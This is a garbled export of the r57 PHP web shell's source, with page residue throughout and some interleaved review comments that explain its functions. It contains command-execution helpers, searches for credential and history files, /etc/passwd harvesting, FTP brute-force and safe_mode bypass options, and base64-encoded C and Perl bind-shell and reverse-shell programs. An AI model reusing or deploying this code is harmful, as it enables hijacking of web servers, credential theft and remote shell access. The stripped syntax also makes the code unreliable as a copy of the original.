ru_text47=>???????? ???????? php.ini, ru_text48=>???????? ????????? ??????, ru_text49=>???????? ??????? ? ???????, ru_text50=>?????????? ? ??????????, ru_text51=>?????????? ? ??????, ru_text52=>????? ??? ??????, ru_text53=>?????? ? ?????, ru_text54=>????? ?????? ? ??????, ru_butt12=>?????, ru_text55=>?????? ? ??????, ru_text56=>?????? ?? ???????, ru_text57=>???????/??????? ????/??????????, ru_text58=>???, ru_text59=>????, ru_text60=>??????????, ru_butt13=>???????/???????, ru_text61=>???? ??????, ru_text62=>?????????? ???????, ru_text63=>???? ??????, ru_text64=>?????????? ???????, ru_text65=>???????, ru_text66=>???????,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  17. 17. ru_text67=>Chown/Chgrp/Chmod, ru_text68=>???????, ru_text69=>????????1, ru_text70=>????????2, ru_text71=>"?????? ???????? ???????:rn- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) rn- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) rn- ??? ??????? CHMOD - ????? ????? ? ???????????? ?? ??????????? (???????? 0777)", ru_text72=>????? ??? ??????, ru_text73=>?????? ? ?????, ru_text74=>?????? ? ??????, ru_text75=>* ????? ???????????? ?????????? ?????????, ru_text76=>????? ?????? ? ?????? ? ??????? ??????? find, ru_text80=>???, ru_text81=>????, ru_text82=>???? ??????, ru_text83=>?????????? SQL ???????, ru_text84=>SQL ??????, ru_text85=>???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ??????? , ru_text86=>?????????? ????? ? ???????, ru_butt14=>???????, ru_text87=>?????????? ?????? ? ?????????? ftp-???????, ru_text88=>FTP-??????:????, ru_text89=>???? ?? ftp ???????, ru_text90=>????? ????????, ru_text91=>???????????? ?, ru_text92=>??? ?????????, ru_text93=>FTP, ru_text94=>FTP-????????, ru_text95=>?????? ?????????????, ru_text96=>?? ??????? ???????? ?????? ?????????????, ru_text97=>????????? ??????????: , ru_text98=>??????? ???????????: , ru_text99=>* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd, ru_text100=>???????? ?????? ?? ????????? ??? ??????, ru_text101=>???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????, ru_text102=>?????, ru_text103=>???????? ??????, ru_text104=>???????? ????? ?? ???????? ????, ru_text105=>????, ru_text106=>??, ru_text107=>????, ru_butt15=>?????????, ru_text108=>????? ??????, ru_text109=>????????, ru_text110=>??????????, ru_text111=>SQL-?????? : ????, ru_text112=>???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail, ru_text113=>???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ??????? ??????? imap_list, ru_text114=>???????? ??????????? ?????? ??????????? 
safe_mode, ???????? ??????????? ????? ? ????????? ????? imap_body, ru_text115=>???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ?file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  18. 18. copy(), ru_text116=>?????????? ????, ru_text117=>?, ru_text118=>???? ??????????, ru_text119=>?? ??????? ??????????? ????, ru_err0=>??????! ?? ???? ???????? ? ???? , ru_err1=>??????! ?? ???? ????????? ???? , ru_err2=>??????! ?? ??????? ??????? , ru_err3=>??????! ?? ??????? ???????????? ? ftp ???????, ru_err4=>?????? ??????????? ?? ftp ???????, ru_err5=>??????! ?? ??????? ???????? ?????????? ?? ftp ???????, ru_err6=>??????! ?? ??????? ????????? ??????, ru_err7=>?????? ??????????, /* --------------------------------------------------------------- */ eng_text1 =>Executed command, eng_text2 =>Execute command on server, eng_text3 =>Run command, eng_text4 =>Work directory, eng_text5 =>Upload files on server, eng_text6 =>Local file, eng_text7 =>Aliases, eng_text8 =>Select alias, eng_butt1 =>Execute, eng_butt2 =>Upload, eng_text9 =>Bind port to /bin/bash, eng_text10=>Port, eng_text11=>Password for access, eng_butt3 =>Bind, eng_text12=>back-connect, eng_text13=>IP, eng_text14=>Port, eng_butt4 =>Connect, eng_text15=>Upload files from remote server, eng_text16=>With, eng_text17=>Remote file, eng_text18=>Local file, eng_text19=>Exploits, eng_text20=>Use, eng_text21=>&nbsp;New name, eng_text22=>datapipe, eng_text23=>Local port, eng_text24=>Remote host, eng_text25=>Remote port, eng_text26=>Use, eng_butt5 =>Run, eng_text28=>Work in safe_mode, eng_text29=>ACCESS DENIED, eng_butt6 =>Change, eng_text30=>Cat file, eng_butt7 =>Show, eng_text31=>File not found, eng_text32=>Eval PHP code, eng_text33=>Test bypass open_basedir with cURL functions, eng_butt8 =>Test,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  19. 19. eng_text34=>Test bypass safe_mode with include function, eng_text35=>Test bypass safe_mode with load file in mysql, eng_text36=>Database . Table, eng_text37=>Login, eng_text38=>Password, eng_text39=>Database, eng_text40=>Dump database table, eng_butt9 =>Dump, eng_text41=>Save dump in file, eng_text42=>Edit files, eng_text43=>File for edit, eng_butt10=>Save, eng_text44=>Cant edit file! Only read access!, eng_text45=>File saved, eng_text46=>Show phpinfo(), eng_text47=>Show variables from php.ini, eng_text48=>Delete temp files, eng_butt11=>Edit file, eng_text49=>Delete script from server, eng_text50=>View cpu info, eng_text51=>View memory info, eng_text52=>Find text, eng_text53=>In dirs, eng_text54=>Find text in files, eng_butt12=>Find, eng_text55=>Only in files, eng_text56=>Nothing :(, eng_text57=>Create/Delete File/Dir, eng_text58=>name, eng_text59=>file, eng_text60=>dir, eng_butt13=>Create/Delete, eng_text61=>File created, eng_text62=>Dir created, eng_text63=>File deleted, eng_text64=>Dir deleted, eng_text65=>Create, eng_text66=>Delete, eng_text67=>Chown/Chgrp/Chmod, eng_text68=>Command, eng_text69=>param1, eng_text70=>param2, eng_text71=>"Second commands param is:rn- for CHOWN - name of new owner or UIDrn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", eng_text72=>Text for find, eng_text73=>Find in folder, eng_text74=>Find in files, eng_text75=>* you can use regexp, eng_text76=>Search text in files via find, eng_text80=>Type, eng_text81=>Net, eng_text82=>Databases, eng_text83=>Run SQL query, eng_text84=>SQL query,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  20. 20. eng_text85=>Test bypass safe_mode with commands execute via MSSQL server, eng_text86=>Download files from server, eng_butt14=>Download, eng_text87=>Download files from remote ftp-server, eng_text88=>FTP-server:port, eng_text89=>File on ftp, eng_text90=>Transfer mode, eng_text91=>Archivation, eng_text92=>without archivation, eng_text93=>FTP, eng_text94=>FTP-bruteforce, eng_text95=>Users list, eng_text96=>Cant get users list, eng_text97=>checked: , eng_text98=>success: , eng_text99=>* use username from /etc/passwd for ftp login and password, eng_text100=>Send file to remote ftp server, eng_text101=>Use reverse (user -> resu) login for password, eng_text102=>Mail, eng_text103=>Send email, eng_text104=>Send file to email, eng_text105=>To, eng_text106=>From, eng_text107=>Subj, eng_butt15=>Send, eng_text108=>Mail, eng_text109=>Hide, eng_text110=>Show, eng_text111=>SQL-Server : Port, eng_text112=>Test bypass safe_mode with function mb_send_mail, eng_text113=>Test bypass safe_mode, view dir list via imap_list, eng_text114=>Test bypass safe_mode, view file contest via imap_body, eng_text115=>Test bypass safe_mode, copy file via compress.zlib:// in function copy(), eng_text116=>Copy from, eng_text117=>to, eng_text118=>File copied, eng_text119=>Cant copy file, eng_err0=>Error! Cant write in file , eng_err1=>Error! Cant read file , eng_err2=>Error! Cant create , eng_err3=>Error! Cant connect to ftp, eng_err4=>Error! Cant login on ftp server, eng_err5=>Error! Cant change dir on ftp, eng_err6=>Error! Cant sent mail, eng_err7=>Mail send, ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( find suid files=>find / -type f -perm -04000 -ls, find suid files in current dir=>find . -type f -perm -04000 -ls,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  21. 21. find sgid files=>find / -type f -perm -02000 -ls, find sgid files in current dir=>find . -type f -perm -02000 -ls, find config.inc.php files=>find / -type f -name config.inc.php, find config.inc.php files in current dir=>find . -type f -name config.inc.php, find config* files=>find / -type f -name "config*", find config* files in current dir=>find . -type f -name "config*", find all writable files=>find / -type f -perm -2 -ls, find all writable files in current dir=>find . -type f -perm -2 -ls, find all writable directories=>find / -type d -perm -2 -ls, find all writable directories in current dir=>find . -type d -perm -2 -ls, find all writable directories and files=>find / -perm -2 -ls, find all writable directories and files in current dir=>find . -perm -2 -ls, find all service.pwd files=>find / -type f -name service.pwd, find service.pwd files in current dir=>find . -type f -name service.pwd, find all .htpasswd files=>find / -type f -name .htpasswd, find .htpasswd files in current dir=>find . -type f -name .htpasswd, find all .bash_history files=>find / -type f -name .bash_history, find .bash_history files in current dir=>find . -type f -name .bash_history, find all .mysql_history files=>find / -type f -name .mysql_history, find .mysql_history files in current dir=>find . -type f -name .mysql_history, find all .fetchmailrc files=>find / -type f -name .fetchmailrc, find .fetchmailrc files in current dir=>find . 
-type f -name .fetchmailrc, list file attributes on a Linux second extended file system=>lsattr -va, show opened ports=>netstat -an | grep -i listen, ----------------------------------------------------------------------------------------------------=>ls -la ); $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Webdings color=gray>4</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET[users])) { if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language._text96]."</font></center>"; } else { echo <center>; foreach($users as $user) { echo $user."<br>"; } echo </center>; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST[dir])) { @chdir($_POST[dir]); }file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  /*
   * NOTE(review): this listing is a damaged export of the script. The "22. 22."
   * style markers and the trailing file:/// ... [date] text appear to be page
   * residue from the export, and string delimiters appear to have been stripped
   * in many places (e.g. getenv(OS), $res = ;), so the text is not valid PHP as
   * shown. The comments below describe only what the visible statements do.
   *
   * Platform detection. $unix is set to 0 when the working directory has ':' as
   * its second character (drive-letter path) and to 1 otherwise. If getcwd()
   * returned nothing, the OS environment variable and then php_uname() are
   * consulted: a value starting with "win" (case-insensitive) gives $unix = 0,
   * anything else, including no value at all, gives $unix = 1.
   * eregi() was removed in PHP 7, so this code targets older interpreters.
   */
  22. 22. $dir = @getcwd(); $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; if(empty($dir)) { $os = getenv(OS); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $unix = 0; } else { $unix = 1; } } }
  /*
   * Request handler for cmd == "search_text". It runs only when the POST fields
   * s_dir, s_text and cmd are all non-empty. A SearchResult is built over s_dir
   * (s_mask is passed as the filter only when both s_mask and m are set),
   * SearchText(0,0) is run, the per-file matches are rendered as an HTML table,
   * a BACK link is printed and the script ends with die().
   *
   * Review notes (defensive reading):
   *  - Every input is taken directly from $_POST; nothing in this block checks
   *    who is asking or limits which directories are read. Any access check
   *    would have to happen earlier in the file.
   *  - $file and the array keys are concatenated into the HTML without escaping.
   *  - $titles is fetched but not used in this block.
   *  - As dumped, the non-unix branch removes "/" from the path; the replacement
   *    string was presumably lost in extraction - unverified.
   *  - For log review: a POST carrying cmd=search_text together with s_dir and
   *    s_text is the request shape this handler responds to.
   */
  if(!empty($_POST[s_dir]) && !empty($_POST[s_text]) && !empty($_POST[cmd]) && $_POST[cmd] == "search_text") { echo $head; if(!empty($_POST[s_mask]) && !empty($_POST[m])) { $sr = new SearchResult($_POST[s_dir],$_POST[s_text],$_POST[s_mask]); } else { $sr = new SearchResult($_POST[s_dir],$_POST[s_text]); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= (!$unix)? str_replace("/","",$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language._text56]."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die();file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  23. 23. }
  /*
   * Command-execution probe. When $safe_mode is not already set, the string
   * "echo abcr57" is run through ex(); unless "r57" is found at offset 3 of the
   * output, $safe_mode is forced to 1. In effect, failure to execute a command
   * is treated the same as safe mode being on.
   * $SERVER_SOFTWARE is then read from the environment, defaulting to "-".
   */
  if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv(SERVER_SOFTWARE); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
  /* ws($i): returns the HTML entity &nbsp; repeated $i times (layout spacing). */
  function ws($i) { return @str_repeat("&nbsp;",$i); }
  /*
   * ex($cfe): runs $cfe as an operating-system command and returns its output.
   * The first available mechanism is used, in this order: exec, shell_exec,
   * system, passthru (both captured through output buffering), then popen read
   * in 1024-byte chunks. Every call is @-suppressed, so failures are silent.
   * When $cfe is empty the initial value of $res is returned (its literal is
   * missing in this dump).
   *
   * Hardening note: because of the fallback chain, a disable_functions setting
   * that names only some of these five functions does not stop this helper;
   * all of them have to be covered. $cfe is passed to the shell as given.
   */
  function ex($cfe) { $res = ; if (!empty($cfe)) { if(function_exists(exec)) { @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists(shell_exec)) { $res = @shell_exec($cfe); } elseif(function_exists(system)) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists(passthru)) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; }
  /*
   * get_users(): reads /etc/passwd with file() and returns an array holding the
   * first ':'-separated field of every line that does not begin with '#'.
   * Returns 0 when the file cannot be read. The function body continues past
   * the export footer onto the next physical line.
   */
  function get_users() { $users = array(); $rows=file(/etc/passwd); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(":",$string); if(substr($string,0,1)!=#) array_push($users,$user[0]);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  24. 24. } return $users; }
  /*
   * The remainder of this physical line defines four helpers, in this order:
   *
   * err($n, $txt): echoes an error banner. The message is looked up in
   *   $GLOBALS[lang] under the key <language>_err<n>; $txt is appended when it
   *   is non-empty. Always returns null.
   *
   * perms($mode): formats a file mode as an ls-style string (type character
   *   followed by owner/group/world rwx triples, with 0x800 / 0x400 / 0x200
   *   turning the execute slot into s/S, s/S and t/T). Returns 0 when
   *   $GLOBALS[unix] is false.
   *   NOTE(review): the type is chosen by testing single masks with & in a
   *   fixed order (0x1000, 0x2000, 0x4000, 0x6000, 0x8000, 0xA000, 0xC000).
   *   Any mode that has the 0x6000, 0xA000 or 0xC000 bits set already matches
   *   an earlier test, so those three branches are never taken and such modes
   *   are labelled by the earlier branch instead.
   *
   * in($type, $name, $size, $value, $checked): returns the markup of an HTML
   *   input element. size is emitted only when non-zero and " checked" only
   *   when $checked is truthy. The arguments are concatenated unescaped.
   *
   * which($pr): runs "which $pr" through ex() and returns the resulting path,
   *   or $pr itself when the output is empty. $pr is interpolated into the
   *   command string without quoting.
   */
  function err($n,$txt=) { echo <table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>; echo $GLOBALS[lang][$GLOBALS[language]._err.$n]; if(!empty($txt)) { echo " $txt"; } echo </b></div></font></td></tr></table>; return null; } function perms($mode) { if (!$GLOBALS[unix]) return 0; if( $mode & 0x1000 ) { $type=p; } else if( $mode & 0x2000 ) { $type=c; } else if( $mode & 0x4000 ) { $type=d; } else if( $mode & 0x6000 ) { $type=b; } else if( $mode & 0x8000 ) { $type=-; } else if( $mode & 0xA000 ) { $type=l; } else if( $mode & 0xC000 ) { $type=s; } else $type=u; $owner["read"] = ($mode & 00400) ? r : -; $owner["write"] = ($mode & 00200) ? w : -; $owner["execute"] = ($mode & 00100) ? x : -; $group["read"] = ($mode & 00040) ? r : -; $group["write"] = ($mode & 00020) ? w : -; $group["execute"] = ($mode & 00010) ? x : -; $world["read"] = ($mode & 00004) ? r : -; $world["write"] = ($mode & 00002) ? w : -; $world["execute"] = ($mode & 00001) ? x : -; if( $mode & 0x800 ) $owner["execute"] = ($owner[execute]==x) ? s : S; if( $mode & 0x400 ) $group["execute"] = ($group[execute]==x) ? s : S; if( $mode & 0x200 ) $world["execute"] = ($world[execute]==x) ? t : T; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner[read], $owner[write], $owner[execute]); $s.=sprintf("%1s%1s%1s", $group[read], $group[write], $group[execute]); $s.=sprintf("%1s%1s%1s", $world[read], $world[write], $world[execute]); return trim($s); } function in($type,$name,$size,$value,$checked=0) { $ret = "<input type=".$type." name=".$name." "; if($size != 0) { $ret .= "size=".$size." "; } $ret .= "value="".$value."""; if($checked) $ret .= " checked"; return $ret.">"; } function which($pr) { $path = ex("which $pr"); if(!empty($path)) { return $path; } else { return $pr; } }file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  25. 25. function cf($fname,$text) { $w_file=@fopen($fname,"w") or err(0); if($w_file) { @fputs($w_file,@base64_decode($text)); @fclose($w_file); } } function sr($l,$t1,$t2) { return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; } if (!@function_exists("view_size")) { function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } } function DirFilesR($dir,$types=) { $files = Array(); if(($handle = @opendir($dir))) { while (false !== ($file = @readdir($handle))) { if ($file != "." && $file != "..") { if(@is_dir($dir."/".$file)) $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); else { $pos = @strrpos($file,"."); $ext = @substr($file,$pos,@strlen($file)-$pos); if($types) { if(@in_array($ext,explode(;,$types))) $files[] = $dir."/".$file; } else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } class SearchResultfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  26. 26. { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter=) { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode( ,$this->text); $delim = |; if($phrase) foreach($qq as $k=>$v) $qq[$k] = b.$v.b; $words = (.@implode($delim,$qq).); $pattern = "/".$words."/"; if(!$case) $pattern .= i; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a]; $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style=color: #990000;><b>1</b></SPAN>",$CurString);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  27. 27. $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3l zL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1 haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCi BzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1v dGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIH NvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZ mQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZ D1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cm l0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpD QogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29 ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IG k7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlb nRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0= "; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAx KSB7IGV4aXQoMSk7IH0NCiRMS 
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3Rjc CcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3 B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgI kNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05 OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05 OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleG VjdXRlICRTSEVMTFxuIjsNCmNsb3Nfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  28. 28. lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2Vj aG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsx XTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx 8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX 1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQp vcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN 5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgP G5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBz aW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J 0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSx zdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19U Q1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVy cm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1c DIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk 7IA0KfQ=="; 